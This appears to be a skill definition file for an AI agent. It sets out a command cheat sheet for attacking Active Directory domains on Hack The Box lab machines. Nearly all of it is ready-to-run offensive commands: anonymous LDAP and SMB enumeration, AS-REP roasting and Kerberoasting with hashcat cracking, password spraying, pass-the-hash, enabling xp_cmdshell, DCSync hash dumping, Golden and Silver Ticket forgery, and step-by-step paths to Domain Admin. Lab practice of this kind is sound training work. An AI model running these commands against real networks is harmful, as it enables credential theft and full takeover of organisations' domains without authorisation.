| name | Active Directory Attacks |
| description | This skill should be used when the user asks about "Active Directory",
"Kerberoasting", "AS-REP roasting", "LDAP enumeration", "BloodHound",
"DCSync", "Pass-the-Hash", "Golden Ticket", or needs guidance on
attacking Windows domain environments.
|
| version | 1.0.0 |
Active Directory Attacks Skill
Overview
Techniques for enumerating and attacking Active Directory environments in HTB machines.
Domain Discovery
Identify Domain Controller
nmap -p53,88,135,139,389,445,636,3268,3269 <TARGET>
Get Domain Information
crackmapexec smb <TARGET>
ldapsearch -x -H ldap://<TARGET> -s base namingContexts
Enumeration Without Credentials
LDAP Anonymous Bind
ldapsearch -x -H ldap://<TARGET> -b "DC=domain,DC=local" "(objectClass=*)"
ldapsearch -x -H ldap://<TARGET> -b "DC=domain,DC=local" "(objectClass=user)" sAMAccountName
ldapsearch -x -H ldap://<TARGET> -b "DC=domain,DC=local" "(objectClass=group)" cn member
ldapsearch -x -H ldap://<TARGET> -b "DC=domain,DC=local" "(description=*)" sAMAccountName description
SMB Null Session
smbclient -L //<TARGET> -N
crackmapexec smb <TARGET> --shares -u '' -p ''
smbmap -H <TARGET> -u '' -p ''
enum4linux -a <TARGET>
RID Cycling
crackmapexec smb <TARGET> -u '' -p '' --rid-brute
lookupsid.py <DOMAIN>/''@<TARGET> -no-pass
User Enumeration via Kerberos
kerbrute userenum -d <DOMAIN> --dc <TARGET> userlist.txt
Kerberos Attacks
AS-REP Roasting (No Credentials Required)
GetNPUsers.py <DOMAIN>/ -no-pass -usersfile users.txt -dc-ip <TARGET> -format hashcat
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
Kerberoasting (Requires Valid Credentials)
GetUserSPNs.py <DOMAIN>/<USER>:<PASS> -dc-ip <TARGET> -request -outputfile tgs.txt
hashcat -m 13100 tgs.txt /usr/share/wordlists/rockyou.txt
Password Spraying
crackmapexec smb <TARGET> -u users.txt -p 'Password123' --continue-on-success
kerbrute passwordspray -d <DOMAIN> --dc <TARGET> users.txt 'Password123'
Enumeration With Credentials
BloodHound Collection
bloodhound-python -u <USER> -p <PASS> -d <DOMAIN> -dc <TARGET> -c all
.\SharpHound.exe -c all
LDAP Enumeration
ldapsearch -x -H ldap://<TARGET> -D "<USER>@<DOMAIN>" -w '<PASS>' \
-b "DC=domain,DC=local" "(objectClass=*)" > ldap_dump.txt
ldapsearch -x -H ldap://<TARGET> -D "<USER>@<DOMAIN>" -w '<PASS>' \
-b "DC=domain,DC=local" "(&(objectClass=group)(cn=Domain Admins))" member
SMB Enumeration
crackmapexec smb <TARGET> -u <USER> -p <PASS> --shares
crackmapexec smb <TARGET> -u <USER> -p <PASS> -M spider_plus
smbclient //<TARGET>/share -U <USER>%<PASS>
Lateral Movement
Pass-the-Hash
psexec.py <DOMAIN>/<USER>@<TARGET> -hashes :<NTLM>
wmiexec.py <DOMAIN>/<USER>@<TARGET> -hashes :<NTLM>
crackmapexec smb <TARGET> -u <USER> -H <NTLM>
Pass-the-Ticket
export KRB5CCNAME=ticket.ccache
psexec.py -k -no-pass <TARGET>
WinRM
crackmapexec winrm <TARGET> -u <USER> -p <PASS>
evil-winrm -i <TARGET> -u <USER> -p <PASS>
evil-winrm -i <TARGET> -u <USER> -H <NTLM>
MSSQL
crackmapexec mssql <TARGET> -u <USER> -p <PASS>
mssqlclient.py <DOMAIN>/<USER>:<PASS>@<TARGET>
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
xp_cmdshell 'whoami'
Domain Privilege Escalation
DCSync Attack
secretsdump.py <DOMAIN>/<USER>:<PASS>@<TARGET>
secretsdump.py <DOMAIN>/<USER>:<PASS>@<TARGET> -just-dc-user krbtgt
Golden Ticket
lookupsid.py <DOMAIN>/<USER>:<PASS>@<TARGET> | grep "Domain SID"
ticketer.py -nthash <KRBTGT_HASH> -domain-sid <SID> -domain <DOMAIN> administrator
export KRB5CCNAME=administrator.ccache
psexec.py -k -no-pass <DOMAIN>/administrator@<DC_HOSTNAME>
Silver Ticket
ticketer.py -nthash <SERVICE_HASH> -domain-sid <SID> -domain <DOMAIN> \
-spn cifs/<TARGET> administrator
export KRB5CCNAME=administrator.ccache
smbclient -k //<TARGET>/C$
Common Attack Paths
Path 1: Anonymous to Domain Admin
- LDAP anonymous → Get users
- AS-REP Roasting → Crack user password
- Kerberoasting → Crack service account
- Service account → Lateral movement
- Find Domain Admin session → Token/hash theft
- DCSync → Dump all hashes
Path 2: Low Priv User to Domain Admin
- BloodHound collection → Find attack paths
- Kerberoasting → Crack SPN accounts
- ACL abuse → Add self to groups
- DCSync or Golden Ticket
Path 3: MSSQL to Domain Admin
- SQL injection → OS command execution
- Enable xp_cmdshell
- Enumerate domain from SQL server
- Capture hashes (Responder)
- Relay or crack hashes
Tools Reference
| Tool | Purpose |
|---|
| Impacket | Swiss army knife for AD |
| CrackMapExec | Quick enumeration |
| BloodHound | Attack path visualization |
| Rubeus | Kerberos attacks |
| Mimikatz | Credential extraction |
| Evil-WinRM | WinRM shells |
| Kerbrute | Kerberos enumeration |
Resources